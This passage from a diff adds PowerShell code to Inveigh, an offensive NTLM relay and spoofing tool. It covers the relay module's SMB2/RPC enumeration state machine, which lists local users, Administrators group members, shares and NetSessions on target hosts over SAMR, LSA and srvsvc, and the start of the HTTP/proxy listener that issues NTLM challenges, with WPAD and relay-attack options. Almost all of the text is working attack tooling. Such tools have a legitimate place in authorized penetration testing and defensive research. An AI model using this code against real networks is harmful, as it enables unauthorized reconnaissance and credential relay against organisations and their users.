+ $enumerate_group_user_list.Add($response_administrator) > $null
+ }
+ else
+ {
+ $enumerate_group_group_list.Add($response_administrator) > $null
+ }
+
+ $i++
+ }
+
+ if($enumerate_group_user_list -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $target $EnumerateGroup group member users:") > $null
+ $inveigh.output_queue.Add($enumerate_group_user_list -join ",") > $null
+ }
+
+ if($enumerate_group_group_list -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $target $EnumerateGroup group member groups:") > $null
+ $inveigh.output_queue.Add($enumerate_group_group_list -join ",") > $null
+ }
+
+ $stage = 'CloseRequest'
+ }
+
+ 'ParseSRVSVC'
+ {
+ $response_object_list = @()
+ $share_list = @()
+ [Byte[]]$response_count_bytes = $client_receive[152..155]
+ $response_count = [System.BitConverter]::ToInt32($response_count_bytes,0)
+ $response_item_index = 164
+
+ if($action_stage -eq 'Share')
+ {
+ $enumerate_share_list = New-Object System.Collections.ArrayList
+ }
+ else
+ {
+ $enumerate_netsession_list = New-Object System.Collections.ArrayList
+ }
+
+ $i = 0
+
+ while($i -lt $response_count)
+ {
+
+ if($i -gt 0)
+ {
+
+ if($response_item_length % 2)
+ {
+ $response_item_index += $response_item_length * 2 + 2
+ }
+ else
+ {
+ $response_item_index += $response_item_length * 2
+ }
+
+ }
+ else
+ {
+
+ if($action_stage -eq 'Share')
+ {
+ $response_item_index += $response_count * 12
+ }
+ else
+ {
+ $response_item_index += $response_count * 16
+ }
+
+ }
+
+ [Byte[]]$response_item_length_bytes = $client_receive[$response_item_index..($response_item_index + 3)]
+ $response_item_length = [System.BitConverter]::ToInt32($response_item_length_bytes,0)
+ $response_item_index += 12
+ [Byte[]]$response_item_bytes = $client_receive[($response_item_index)..($response_item_index + ($response_item_length * 2 - 1))]
+ $response_item = [System.BitConverter]::ToString($response_item_bytes)
+ $response_item = $response_item -replace "-00",""
+ $response_item = $response_item.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $response_item = New-Object System.String ($response_item,0,$response_item.Length)
+
+ if($response_item_length % 2)
+ {
+ $response_item_index += $response_item_length * 2 + 2
+ }
+ else
+ {
+ $response_item_index += $response_item_length * 2
+ }
+
+ [Byte[]]$response_item_length_bytes = $client_receive[$response_item_index..($response_item_index + 3)]
+ $response_item_length = [System.BitConverter]::ToInt32($response_item_length_bytes,0)
+ $response_item_index += 12
+ [Byte[]]$response_item_2_bytes = $client_receive[($response_item_index)..($response_item_index + ($response_item_length * 2 - 1))]
+ $response_item_2 = [System.BitConverter]::ToString($response_item_2_bytes)
+ $response_item_2 = $response_item_2 -replace "-00",""
+ $response_item_2 = $response_item_2.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $response_item_2 = New-Object System.String ($response_item_2,0,$response_item_2.Length)
+
+ if($action_stage -eq 'Share')
+ {
+
+ if($response_item -ne 'ADMIN$' -and $response_item -notmatch '^[a-zA-Z][\$]$' -and $response_item -ne 'IPC$' -and $response_item -ne 'print$')
+ {
+ $enumerate_share_list.Add($response_item) > $null
+ }
+
+ }
+ else
+ {
+
+ if($response_item -ne "\\" + $client.Client.LocalEndPoint.Address.IPAddressToString)
+ {
+ $enumerate_netsession_list.Add($response_item + "\" + $response_item_2) > $null
+ }
+
+ }
+
+ $i++
+ }
+
+ if($enumerate_share_list.Count -gt 0 -and $action_stage -eq 'Share')
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $target custom shares:") > $null
+ $inveigh.output_queue.Add($enumerate_share_list -join ",") > $null
+ }
+
+ if($enumerate_netsession_list.Count -gt 0 -and $action_stage -eq 'NetSession')
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $target NetSessions:") > $null
+ $inveigh.output_queue.Add($enumerate_netsession_list -join ",") > $null
+ }
+
+ $stage = 'CloseRequest'
+ }
+
+ 'ParseUsers'
+ {
+ [Byte[]]$response_user_count_bytes = $client_receive[148..151]
+ $response_user_count = [System.BitConverter]::ToInt16($response_user_count_bytes,0)
+ $response_user_start = $response_user_count * 12 + 172
+ $response_user_end = $response_user_start
+ $response_RID_start = 160
+ $response_user_length_start = 164
+ $enumerate_user_list = New-Object System.Collections.ArrayList
+ $i = 0
+
+ while($i -lt $response_user_count)
+ {
+ $response_user_object = New-Object PSObject
+ [Byte[]]$response_user_length_bytes = $client_receive[$response_user_length_start..($response_user_length_start + 1)]
+ $response_user_length = [System.BitConverter]::ToInt16($response_user_length_bytes,0)
+ [Byte[]]$response_RID_bytes = $client_receive[$response_RID_start..($response_RID_start + 3)]
+ $response_user_end = $response_user_start + $response_user_length
+ [Byte[]]$response_actual_count_bytes = $client_receive[($response_user_start - 4)..($response_user_start - 1)]
+ $response_actual_count = [System.BitConverter]::ToInt16($response_actual_count_bytes,0)
+ [Byte[]]$response_user_bytes = $client_receive[$response_user_start..($response_user_end - 1)]
+
+ if($response_actual_count % 2)
+ {
+ $response_user_start += $response_user_length + 14
+ }
+ else
+ {
+ $response_user_start += $response_user_length + 12
+ }
+
+ $response_user = [System.BitConverter]::ToString($response_user_bytes)
+ $response_user = $response_user -replace "-00",""
+ $response_user = $response_user.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $response_user = New-Object System.String ($response_user,0,$response_user.Length)
+ $response_user_length_start = $response_user_length_start + 12
+ $response_RID_start = $response_RID_start + 12
+ $i++
+
+ if($response_user -ne 'Guest')
+ {
+ $enumerate_user_list.Add($response_user) > $null
+ }
+
+ }
+
+ if($enumerate_user_list -gt 0)
+ {
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] $target local users:") > $null
+ $inveigh.output_queue.Add($enumerate_user_list -join ",") > $null
+ }
+
+ $stage = 'CloseRequest'
+ }
+
+ 'QueryGroupMember'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMRQueryGroupMember $group_handle
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x10,0x00,0x00,0x00 0x00,0x00 0x19,0x00
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'QueryInfoRequest'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SMB_data = New-PacketSMB2QueryInfoRequest 0x01 0x05 0x18,0x00,0x00,0x00 0x68,0x00 $file_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $stage = 'SendReceive'
+ }
+
+ 'ReadRequest'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x08,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SMB_data = New-PacketSMB2ReadRequest $file_ID
+ $packet_SMB_data["Length"] = 0x00,0x04,0x00,0x00
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $stage = 'SendReceive'
+ }
+
+ 'RPCBind'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x09,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_RPC_data = New-PacketRPCBind $frag_length $call_ID $num_ctx_items 0x00,0x00 $named_pipe_UUID $named_pipe_UUID_version
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $packet_SMB_data = New-PacketSMB2WriteRequest $file_ID $RPC_data.Length
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $stage = 'SendReceive'
+ }
+
+ 'SAMRCloseRequest'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SAMR_data = New-PacketSAMRClose $SAMR_domain_handle
+ $SAMR_data = ConvertFrom-PacketOrderedDictionary $packet_SAMR_data
+ $packet_RPC_data = New-PacketRPCRequest 0x03 $SAMR_data.Length 0 0 0x09,0x00,0x00,0x00 0x00,0x00 0x01,0x00
+ $packet_SMB_data = New-PacketSMB2IoctlRequest 0x17,0xc0,0x11,0x00 $file_ID $SAMR_data.Length 4280
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length + $SAMR_data.Length
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SAMR_data
+ $stage = 'SendReceive'
+ }
+
+ 'SendReceive'
+ {
+ $client_stream.Write($client_send,0,$client_send.Length) > $null
+ $client_stream.Flush()
+ $client_stream.Read($client_receive,0,$client_receive.Length) > $null
+
+ if(Get-StatusPending $client_receive[12..15])
+ {
+ $stage = 'StatusPending'
+ }
+ else
+ {
+ $stage = 'StatusReceived'
+ }
+
+ }
+
+ 'StatusPending'
+ {
+ $client_stream.Read($client_receive,0,$client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($client_receive[12..15]) -ne '03-01-00-00')
+ {
+ $stage = $stage_next
+ }
+
+ }
+
+ 'StatusReceived'
+ {
+
+ switch ($stage_current)
+ {
+
+ 'CloseRequest'
+ {
+
+ if($step -eq 1)
+ {
+ $named_pipe = 0x73,0x00,0x61,0x00,0x6d,0x00,0x72,0x00 # samr
+ $stage = 'CreateRequest'
+ }
+ elseif($action_stage -eq 'Share' -and $share_list.Count -gt 0)
+ {
+ $stage = 'TreeConnect'
+ }
+ else
+ {
+ $stage = 'TreeDisconnect'
+ }
+
+ }
+
+ 'Connect2'
+ {
+ $step++
+
+ if($client_receive[119] -eq 3 -and [System.BitConverter]::ToString($client_receive[140..143]) -eq '05-00-00-00')
+ {
+ $RPC_access_denied = $true
+ $stage = 'CloseRequest'
+ }
+ else
+ {
+ $SID_count = 0x04,0x00,0x00,0x00
+ [Byte[]]$SAMR_connect_handle = $client_receive[140..159]
+ $stage = 'OpenDomain'
+ }
+
+ }
+
+ 'Connect5'
+ {
+ $step++
+
+ if($client_receive[119] -eq 3 -and [System.BitConverter]::ToString($client_receive[140..143]) -eq '05-00-00-00')
+ {
+ $stage = 'CloseRequest'
+ }
+ else
+ {
+ $SID_count = 0x04,0x00,0x00,0x00
+ [Byte[]]$SAMR_connect_handle = $client_receive[156..175]
+ $stage = 'OpenDomain'
+ }
+
+ }
+
+ 'CreateRequest'
+ {
+
+ if($action_stage -eq 'Share')
+ {
+ $frag_length = 0x48,0x00
+ $call_ID = 2
+ $num_ctx_items = 0x01
+ $named_pipe_UUID = 0xc8,0x4f,0x32,0x4b,0x70,0x16,0xd3,0x01,0x12,0x78,0x5a,0x47,0xbf,0x6e,0xe1,0x88
+ $named_pipe_UUID_version = 0x03,0x00
+ $stage_next = 'NetShareEnumAll'
+ }
+ elseif($action_stage -eq 'NetSession')
+ {
+ $frag_length = 0x74,0x00
+ $call_ID = 2
+ $num_ctx_items = 0x02
+ $named_pipe_UUID = 0xc8,0x4f,0x32,0x4b,0x70,0x16,0xd3,0x01,0x12,0x78,0x5a,0x47,0xbf,0x6e,0xe1,0x88
+ $named_pipe_UUID_version = 0x03,0x00
+ $stage_next = 'NetSessEnum'
+ }
+ elseif($step -eq 1)
+ {
+ $frag_length = 0x48,0x00
+ $call_ID = 5
+ $num_ctx_items = 0x01
+ $named_pipe_UUID = 0x78,0x57,0x34,0x12,0x34,0x12,0xcd,0xab,0xef,0x00,0x01,0x23,0x45,0x67,0x89,0xac
+ $named_pipe_UUID_version = 0x01,0x00
+
+ if($action_stage -eq 'User')
+ {
+ $stage_next = 'Connect5'
+ }
+ else
+ {
+ $stage_next = 'Connect2'
+ }
+
+ }
+ elseif($step -gt 2)
+ {
+ $frag_length = 0x48,0x00
+ $call_ID = 14
+ $num_ctx_items = 0x01
+ $named_pipe_UUID = 0x78,0x57,0x34,0x12,0x34,0x12,0xcd,0xab,0xef,0x00,0x01,0x23,0x45,0x67,0x89,0xab
+ $named_pipe_UUID_version = 0x00,0x00
+ $named_pipe = 0x78,0x57,0x34,0x12,0x34,0x12,0xcd,0xab,0x76,0x00,0x63,0x00
+ $stage_next = 'LSAOpenPolicy'
+ }
+ else
+ {
+ $frag_length = 0x48,0x00
+ $call_ID = 1
+ $num_ctx_items = 0x01
+ $named_pipe_UUID = 0x78,0x57,0x34,0x12,0x34,0x12,0xcd,0xab,0xef,0x00,0x01,0x23,0x45,0x67,0x89,0xab
+ $named_pipe_UUID_version = 0x00,0x00
+ $named_pipe = 0x78,0x57,0x34,0x12,0x34,0x12,0xcd,0xab,0x76,0x00,0x63,0x00
+ $stage_next = 'LSAOpenPolicy'
+ }
+
+ $file_ID = $client_receive[132..147]
+
+ if($Refresh -and $stage -ne 'Exit')
+ {
+ Write-Output "[+] Session refreshed" # check
+ $stage = 'Exit'
+ }
+ elseif($step -ge 2)
+ {
+ $stage = 'RPCBind'
+ }
+ elseif($stage -ne 'Exit')
+ {
+ $stage = 'QueryInfoRequest'
+ }
+
+ }
+
+ 'EnumDomainUsers'
+ {
+ $step++
+ $stage = 'ParseUsers'
+ }
+
+ 'GetMembersInAlias'
+ {
+ $step++
+ [Byte[]]$SID_array = $client_receive[140..([System.BitConverter]::ToInt16($client_receive[3..1],0) - 1)]
+
+ if([System.BitConverter]::ToString($client_receive[156..159]) -eq '73-00-00-c0')
+ {
+ $stage = 'SAMRCloseRequest'
+ }
+ else
+ {
+ $named_pipe = 0x6c,0x00,0x73,0x00,0x61,0x00,0x72,0x00,0x70,0x00,0x63,0x00 # lsarpc
+ $stage = 'CreateRequest'
+ }
+
+ }
+
+ 'Logoff'
+ {
+ $stage = 'Exit'
+ }
+
+ 'LookupNames'
+ {
+ $step++
+ [Byte[]]$SAMR_RID = $client_receive[152..155]
+
+ if([System.BitConverter]::ToString($client_receive[156..159]) -eq '73-00-00-c0')
+ {
+ $stage = 'SAMRCloseRequest'
+ }
+ else
+ {
+
+ if($step -eq 4)
+ {
+ $stage = 'OpenGroup'
+ }
+ else
+ {
+ $stage = 'OpenAlias'
+ }
+
+ }
+
+ }
+
+ 'LookupRids'
+ {
+ $step++
+ $stage = 'ParseLookupRids'
+ }
+
+ 'LSAClose'
+ {
+ $stage = 'CloseRequest'
+ }
+
+ 'LSALookupSids'
+ {
+ $stage = 'ParseLookupSids'
+ }
+
+ 'LSAOpenPolicy'
+ {
+ [Byte[]]$policy_handle = $client_receive[140..159]
+
+ if($step -gt 2)
+ {
+ $stage = 'LSALookupSids'
+ }
+ else
+ {
+ $stage = 'LSAQueryInfoPolicy'
+ }
+
+ }
+
+ 'LSAQueryInfoPolicy'
+ {
+ [Byte[]]$LSA_domain_length_bytes = $client_receive[148..149]
+ $LSA_domain_length = [System.BitConverter]::ToInt16($LSA_domain_length_bytes,0)
+ [Byte[]]$LSA_domain_actual_count_bytes = $client_receive[168..171]
+ $LSA_domain_actual_count = [System.BitConverter]::ToInt32($LSA_domain_actual_count_bytes,0)
+
+ if($LSA_domain_actual_count % 2)
+ {
+ $LSA_domain_length += 2
+ }
+
+ [Byte[]]$LSA_domain_SID = $client_receive[(176 + $LSA_domain_length)..(199 + $LSA_domain_length)]
+ $stage = 'LSAClose'
+ }
+
+ 'NetSessEnum'
+ {
+
+ if([System.BitConverter]::ToString($client_receive[172..175]) -eq '05-00-00-00' -or [System.BitConverter]::ToString($client_receive[12..15]) -ne '00-00-00-00')
+ {
+ $stage = 'CloseRequest'
+ }
+ else
+ {
+ $stage = 'ParseSRVSVC'
+ }
+
+ }
+
+ 'NetShareEnumAll'
+ {
+ $stage = 'ParseSRVSVC'
+ }
+
+ 'OpenAlias'
+ {
+ $step++
+ [Byte[]]$SAMR_policy_handle = $client_receive[140..159]
+
+ if([System.BitConverter]::ToString($client_receive[156..159]) -eq '73-00-00-c0')
+ {
+ $stage = 'SAMRCloseRequest'
+ }
+ else
+ {
+ $stage = 'GetMembersInAlias'
+ }
+
+ }
+
+ 'OpenDomain'
+ {
+ $step++
+ [Byte[]]$SAMR_domain_handle = $client_receive[140..159]
+
+ if($action_stage -eq 'User')
+ {
+ $stage = 'EnumDomainUsers'
+ }
+ else
+ {
+ $stage = 'LookupNames'
+ }
+
+ }
+
+ 'OpenGroup'
+ {
+ $step++
+ [Byte[]]$group_handle = $client_receive[140..159]
+ $stage = 'QueryGroupMember'
+ }
+
+ 'QueryGroupMember'
+ {
+ $step++
+ [Byte[]]$RID_count_bytes = $client_receive[144..147]
+ $RID_count = [System.BitConverter]::ToInt16($RID_count_bytes,0)
+ [Byte[]]$RID_list = $client_receive[160..(159 + ($RID_count * 4))]
+ $stage = 'LookupRids'
+ }
+
+ 'QueryInfoRequest'
+ {
+ $file_ID = $client_receive[132..147]
+ $stage = 'RPCBind'
+ }
+
+ 'ReadRequest'
+ {
+ $stage = $stage_next
+ }
+
+ 'RPCBind'
+ {
+ $stage = 'ReadRequest'
+ }
+
+ 'SAMRCloseRequest'
+ {
+ $step++
+
+ if($step -eq 8)
+ {
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $Group group not found") > $null
+ $stage = 'TreeDisconnect'
+ }
+ else
+ {
+
+ if($step -eq 5 -and $action_stage -eq 'Group')
+ {
+ $LSA_domain_SID = 0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00
+ $SID_count = 0x01,0x00,0x00,0x00
+ }
+
+ $stage = 'OpenDomain'
+ }
+
+ }
+
+ 'TreeConnect'
+ {
+ $tree_ID = $client_receive[40..43]
+ $access_mask = $null
+
+ if($client_receive[76] -eq 92)
+ {
+ $tree_access_mask = 0x00,0x00,0x00,0x00
+ }
+ else
+ {
+ $tree_access_mask = $client_receive[80..83]
+ }
+
+ if($share_list.Count -gt 0)
+ {
+
+ if($client_receive[76] -ne 92)
+ {
+
+ foreach($byte in $tree_access_mask)
+ {
+ $access_mask = [System.Convert]::ToString($byte,2).PadLeft(8,'0') + $access_mask
+ }
+
+ $response_object_list | Where-Object {$_.Share -eq $share_list[$j]} | ForEach-Object {$_."Access Mask" = $access_mask}
+ $stage = 'TreeDisconnect'
+ }
+ else
+ {
+ $access_mask = "00000000000000000000000000000000"
+ $response_object_list | Where-Object {$_.Share -eq $share_list[$j]} | ForEach-Object {$_."Access Mask" = $access_mask}
+ $stage = 'TreeConnect'
+ $j++
+ }
+
+ }
+ else
+ {
+
+ if($action_stage -eq 'Share' -or $action_stage -eq 'NetSession')
+ {
+ $named_pipe = 0x73,0x00,0x72,0x00,0x76,0x00,0x73,0x00,0x76,0x00,0x63,0x00 # srvsvc
+ }
+ else
+ {
+ $named_pipe = 0x6c,0x00,0x73,0x00,0x61,0x00,0x72,0x00,0x70,0x00,0x63,0x00 # lsarpc
+ }
+
+ $tree_IPC = $tree_ID
+ $stage = 'CreateRequest'
+ }
+
+ }
+
+ 'TreeDisconnect'
+ {
+
+ if($Action -eq 'All')
+ {
+
+ switch ($action_stage)
+ {
+
+ 'group'
+ {
+
+ if($RPC_access_denied)
+ {
+ $action_stage = "share"
+ }
+ else
+ {
+ $action_stage = "user"
+ $step = 0
+ }
+
+ $stage = "treeconnect"
+ }
+
+ 'user'
+ {
+ $action_stage = "netsession"
+ $stage = "treeconnect"
+ }
+
+ 'netsession'
+ {
+ $action_stage = "share"
+ $stage = "treeconnect"
+ }
+
+ 'share'
+ {
+
+ if($share_list.Count -gt 0 -and $j -lt $share_list.Count - 1)
+ {
+ $stage = 'TreeConnect'
+ $j++
+ }
+ elseif($share_list.Count -gt 0 -and $j -eq $share_list.Count - 1)
+ {
+ $tree_ID = $tree_IPC
+ $stage = 'TreeDisconnect'
+ $j++
+ }
+ else
+ {
+
+ if($attack -contains 'session')
+ {
+ $stage = 'Exit'
+ }
+ else
+ {
+ $stage = 'Logoff'
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+ else
+ {
+
+ if($action_stage -eq 'Share' -and $share_list.Count -gt 0 -and $j -lt $share_list.Count - 1)
+ {
+ $stage = 'TreeConnect'
+ $j++
+ }
+ elseif($action_stage -eq 'Share' -and $share_list.Count -gt 0 -and $j -eq $share_list.Count - 1)
+ {
+ $tree_ID = $tree_IPC
+ $stage = 'TreeDisconnect'
+ $j++
+ }
+ else
+ {
+
+ if($inveigh_session -and !$Logoff)
+ {
+ $stage = 'Exit'
+ }
+ else
+ {
+ $stage = 'Logoff'
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+
+ 'TreeConnect'
+ {
+ $message_ID++
+ $stage_current = $stage
+
+ if($share_list.Count -gt 0)
+ {
+ $path = "\\" + $Target + "\" + $share_list[$j]
+ $path_bytes = [System.Text.Encoding]::Unicode.GetBytes($path)
+ }
+
+ $packet_SMB_header = New-PacketSMB2Header 0x03,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SMB_data = New-PacketSMB2TreeConnectRequest $path_bytes
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $stage = 'SendReceive'
+ }
+
+ 'TreeDisconnect'
+ {
+ $message_ID++
+ $stage_current = $stage
+ $packet_SMB_header = New-PacketSMB2Header 0x04,0x00 0x01,0x00 $SMB_signing $message_ID $process_ID $tree_ID $session_ID
+ $packet_SMB_data = New-PacketSMB2TreeDisconnectRequest
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $stage = 'SendReceive'
+ }
+
+ }
+
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message $($_.InvocationInfo.Line.Trim()) stage $stage_current") > $null
+ $stage -ne 'Exit'
+ }
+
+ }
+
+ For($i = 0;$i -lt $enumerate_group_user_list.Count;$i++)
+ {
+ $user_entry = $enumerate_group_user_list[$i]
+ $user_entry_split = $user_entry.Split("\")
+ $domain = $user_entry_split[0]
+ $username = $user_entry_split[1]
+
+ if($inveigh.domain_mapping_table.ContainsKey($domain))
+ {
+ $user_update = ($username + "@" + $inveigh.domain_mapping_table.$domain).ToUpper()
+ $enumerate_group_user_list[$i] = $user_update
+ }
+
+ }
+
+ For($i = 0;$i -lt $enumerate_group_group_list.Count;$i++)
+ {
+ $group_entry = $enumerate_group_group_list[$i]
+ $group_entry_split = $group_entry.Split("\")
+ $domain = $group_entry_split[0]
+ $group = $group_entry_split[1]
+
+ if($inveigh.domain_mapping_table.ContainsKey($domain))
+ {
+ $group_update = ($group + "@" + $inveigh.domain_mapping_table.$domain).ToUpper()
+ $enumerate_group_group_list[$i] = $group_update
+ }
+
+ }
+
+ $inveigh.session_message_ID_table[$inveigh.session_count] = $message_ID
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -eq $target)
+ {
+ $target_index = $i
+ break
+ }
+
+ }
+
+ if($EnumerateGroup -eq 'Administrators')
+ {
+ $inveigh.enumerate[$target_index]."Administrator Users" = $enumerate_group_user_list
+ $inveigh.enumerate[$target_index]."Administrator Groups" = $enumerate_group_group_list
+ }
+
+ $inveigh.enumerate[$target_index]."Local Users" = $enumerate_user_list
+ $inveigh.enumerate[$target_index].Shares = $enumerate_share_list
+ $net_sessions_unique = @()
+
+ foreach($net_session_entry in $enumerate_netsession_list)
+ {
+
+ if($inveigh.enumerate[$target_index].NetSessions -notcontains $net_session_entry)
+ {
+ $net_sessions_unique += $net_session_entry
+ }
+
+ $net_session_IP = ($net_session_entry.Split("\"))[2]
+ $net_session_user = ($net_session_entry.Split("\"))[3]
+
+ for($i = 0;$i -lt $inveigh.enumerate.Count;$i++)
+ {
+
+ if($inveigh.enumerate[$i].IP -contains $net_session_IP)
+ {
+ $net_session_index = $i
+ break
+ }
+
+ }
+
+ if($net_session_index -and $inveigh.enumerate[$net_session_index].NetSessions -notcontains $net_session_user)
+ {
+ $inveigh.enumerate[$net_session_index]."NetSessions Mapped" += $net_session_user
+ }
+ else
+ {
+ $inveigh.enumerate.Add((New-RelayEnumObject -IP $net_session_IP -NetSessionsMapped $net_session_user)) > $null
+ }
+
+ }
+
+ $inveigh.enumerate[$target_index].NetSessions += $net_sessions_unique
+
+ if(!$RPC_access_denied)
+ {
+ $inveigh.enumerate[$target_index].Enumerate = $(Get-Date -format s)
+ }
+
+ }
+
+}
+
+# HTTP/HTTPS/Proxy Server ScriptBlock
+$HTTP_scriptblock =
+{
+ param ($Attack,$Challenge,$Command,$Enumerate,$EnumerateGroup,$FailedLoginThreshold,$HTTPIP,$HTTPPort,
+ $HTTPS_listener,$Proxy,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$RepeatEnumerate,
+ $RepeatExecute,$Service,$SMB_version,$SessionLimitPriv,$SessionLimitUnpriv,$SessionLimitShare,
+ $SessionPriority,$Target,$TargetMode,$TargetRefresh,$Username,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
+
+ function Get-NTLMChallengeBase64
+ {
+ param ([String]$Challenge,[String]$ClientIPAddress,[Int]$ClientPort)
+
+ $HTTP_timestamp = Get-Date
+ $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
+ $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+ $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+ if($Challenge)
+ {
+ $HTTP_challenge = $Challenge
+ $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+ $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $HTTP_challenge_bytes = [String](1..8 | ForEach-Object{"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+ $HTTP_challenge = $HTTP_challenge_bytes -replace ' ',''
+ $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+
+ $inveigh.HTTP_challenge_queue.Add($ClientIPAddress + $ClientPort + ',' + $HTTP_challenge) > $null
+ $hostname_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.computer_name)
+ $netBIOS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.netBIOS_domain)
+ $DNS_domain_bytes = [System.Text.Encoding]::Unicode.GetBytes($inveigh.DNS_domain)
